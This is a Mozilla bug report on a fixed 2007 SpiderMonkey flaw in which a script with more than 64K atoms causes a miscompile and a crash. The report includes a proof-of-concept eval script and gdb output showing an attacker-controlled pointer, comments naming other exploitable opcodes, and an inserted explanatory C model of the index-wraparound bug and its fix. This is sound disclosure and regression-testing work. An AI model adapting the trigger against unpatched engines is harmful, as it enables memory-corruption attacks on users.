Bug 366122 - large script miscompiles
Status: VERIFIED FIXED
[sg:critical?] hold for comment 10,11...
: crash, verified1.8.0.10, verified1.8.1.2
Product: Core
Classification: Components
Component: JavaScript Engine (show other bugs)
: Trunk
: All All
: -- critical (vote)
Assigned To: Igor Bukanov
Depends on: 365608
Reported: 2007-01-06 01:12 PST by shutdown
Modified: 2007-06-14 15:16 PDT (History)
jaymoz: blocking1.8.1.2+
jaymoz: blocking1.8.0.10+
bob: in‑testsuite+
Attachments
Fix v1 (1.04 KB, patch)
2007-01-08 18:10 PST, Igor Bukanov
brendan: review+
dveditz: approval1.8.1.2+
dveditz: approval1.8.0.10+
js1_5/Regress/regress-366122.js (2.60 KB, text/plain)
2007-01-17 03:47 PST, Bob Clary [:bc:]

Description shutdown 2007-01-06 01:12:08 PST
$ cat 019-large-script.txt
function exploit() {
  var code = "", obj = {};
  for(var i = 0; i < 0x10000; i++) {
    if(i == 10242) {
      code += "void 0x10000050505050;\n";
    } else {
      code += "void 'x" + i + "';\n";
    }
  }
  code += "export undefined;\n";
  code += "void 125;\n";
  eval(code);
}
exploit();

$ gdb --eval run --args opt.obj/js 019-large-script.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xab0750,
    pc=0x165aa13 "}(\002\303", '\265' <repeats 196 times>..., result=0x98e930)
    at jsinterp.c:4942
4942                id = ATOM_TO_JSID(fun->atom);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 6, 15145248, 6, 15145296, 6},
  dslots = 0xe71980}

exploitable.
Comment 1 Igor Bukanov 2007-01-06 04:18:23 PST
The last patch for bug 365608 fixes this.
Comment 2 Igor Bukanov 2007-01-08 06:22:34 PST
Fixed on trunk as a consequence of a general reorganisation of atom table access in bug 365608.
Comment 3 Daniel Veditz [:dveditz] 2007-01-08 08:34:08 PST
I crash on the 1.8 branch, too. TB28149817

Bug 365608 is a big change, is there something more conservative we could do for the branches, like bail out if we hit a limit?
Comment 4 Igor Bukanov 2007-01-08 09:09:26 PST
(In reply to comment #3)
> Bug 365608 is a big change, is there something more conservative we could do
> for the branches, like bail out if we hit a limit?

Sure, this would be a better solution for branches especially given the regression in bug 366312. AFAICS this bug, bug 366123 and bug 365692 cover all the cases of the problem, but I will check it one more time to be sure. 
Comment 5 Igor Bukanov 2007-01-08 18:10:51 PST
Created attachment 250923 [details] [diff] [review]
Fix v1

Minimal fix for 1.8.* branches to report an error about too big script.
Comment 6 Daniel Veditz [:dveditz] 2007-01-10 14:29:45 PST
Comment on attachment 250923 [details] [diff] [review]
Fix v1

Approved for 1.8/1.8.0 branches, a=dveditz for drivers
Comment 7 Igor Bukanov 2007-01-10 14:51:44 PST
I committed the patch from comment 5 to MOZILLA_1_8_BRANCH:

Checking in jsemit.c;
/cvsroot/mozilla/js/src/jsemit.c,v  <--  jsemit.c
new revision: 3.128.2.64; previous revision: 3.128.2.63
done
Comment 8 Igor Bukanov 2007-01-10 14:55:52 PST
I committed the patch from comment 5 to MOZILLA_1_8_0_BRANCH:

Checking in jsemit.c;
/cvsroot/mozilla/js/src/jsemit.c,v  <--  jsemit.c
new revision: 3.128.2.3.2.15; previous revision: 3.128.2.3.2.14
done
Comment 9 Bob Clary [:bc:] 2007-01-17 03:47:55 PST
Created attachment 251761 [details]
js1_5/Regress/regress-366122.js
Comment 10 shutdown 2007-01-17 23:09:49 PST
(In reply to comment #5)
> Created an attachment (id=250923) [details]
> Fix v1
> Minimal fix for 1.8.* branches to report an error about too big script. 

JSOP_SETCONT is exploitable too.
JSOP_(GET|SET)METHOD is suspicious.
Comment 11 Igor Bukanov 2007-01-19 17:04:07 PST
(In reply to comment #10)
> JSOP_SETCONT is exploitable too.
> JSOP_(GET|SET)METHOD is suspicious.

I think all these cases are exploitable since the decompiler assumes that the atom corresponding to the bytecode is a string. The case of JSOP_METHOD is especially bad since one cannot throw an error for a too-big script on it. Otherwise any script containing over 64K atoms and function calls would not compile. I will file a separate bug for it.
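Added illustration of the bug class behind the description's script and comment 11; this is not SpiderMonkey code and not the patch from comment 5. It models a 16-bit atom-index operand that wraps once a script interns more than 0x10000 atoms, so a consumer that trusts the operand to name a string atom can be handed a double instead, and shows the branch fix's approach of reporting an error for a too-large script instead of emitting a wrapped operand. The table layout, the slot 10242 and all function names are hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>

#define ATOM_INDEX_LIMIT 0x10000u   /* largest count a 16-bit operand can name */

typedef enum { ATOM_STRING, ATOM_DOUBLE } AtomKind;
typedef struct { AtomKind *kinds; uint32_t count, capacity; } AtomTable;

/* Hypothetical intern helper: returns the atom's unbounded table index. */
uint32_t atom_intern(AtomTable *t, AtomKind kind) {
    if (t->count == t->capacity) {
        t->capacity = t->capacity ? t->capacity * 2 : 1024;
        t->kinds = realloc(t->kinds, t->capacity * sizeof *t->kinds);
    }
    t->kinds[t->count] = kind;
    return t->count++;
}

/* Defect pattern: the emitter silently truncates the index to operand width. */
uint16_t emit_atom_operand_unchecked(uint32_t index) { return (uint16_t)index; }

/* Branch-style fix: refuse to emit and report "script too large" (-1). */
int emit_atom_operand_checked(uint32_t index, uint16_t *operand) {
    if (index >= ATOM_INDEX_LIMIT) return -1;
    *operand = (uint16_t)index;
    return 0;
}

/* Constructed script shape: a double atom at slot 10242 among string atoms,
 * then one more string atom interned after 0x10000 + 10242 atoms. Returns the
 * kind the truncated operand really names when a consumer trusts it. */
AtomKind kind_seen_by_unchecked_consumer(void) {
    AtomTable t = { NULL, 0, 0 };
    for (uint32_t i = 0; i < ATOM_INDEX_LIMIT + 10242; i++)
        atom_intern(&t, i == 10242 ? ATOM_DOUBLE : ATOM_STRING);
    uint32_t late = atom_intern(&t, ATOM_STRING);    /* index 0x10000 + 10242 */
    uint16_t operand = emit_atom_operand_unchecked(late);  /* wraps to 10242 */
    AtomKind seen = t.kinds[operand];   /* consumer assumed a string atom here */
    free(t.kinds);
    return seen;                        /* ATOM_DOUBLE: the type confusion */
}

/* The same late atom through the checked emitter: compilation fails cleanly. */
int checked_emitter_rejects_late_atom(void) {
    uint16_t operand;
    return emit_atom_operand_checked(ATOM_INDEX_LIMIT + 10242, &operand);
}
```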
Comment 12 Bob Clary [:bc:] 2007-01-29 09:05:51 PST
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Comment 13 Bob Clary [:bc:] 2007-06-14 15:16:11 PDT
/cvsroot/mozilla/js/tests/js1_5/Regress/regress-366122.js,v  <--  regress-366122.js
initial revision: 1.1
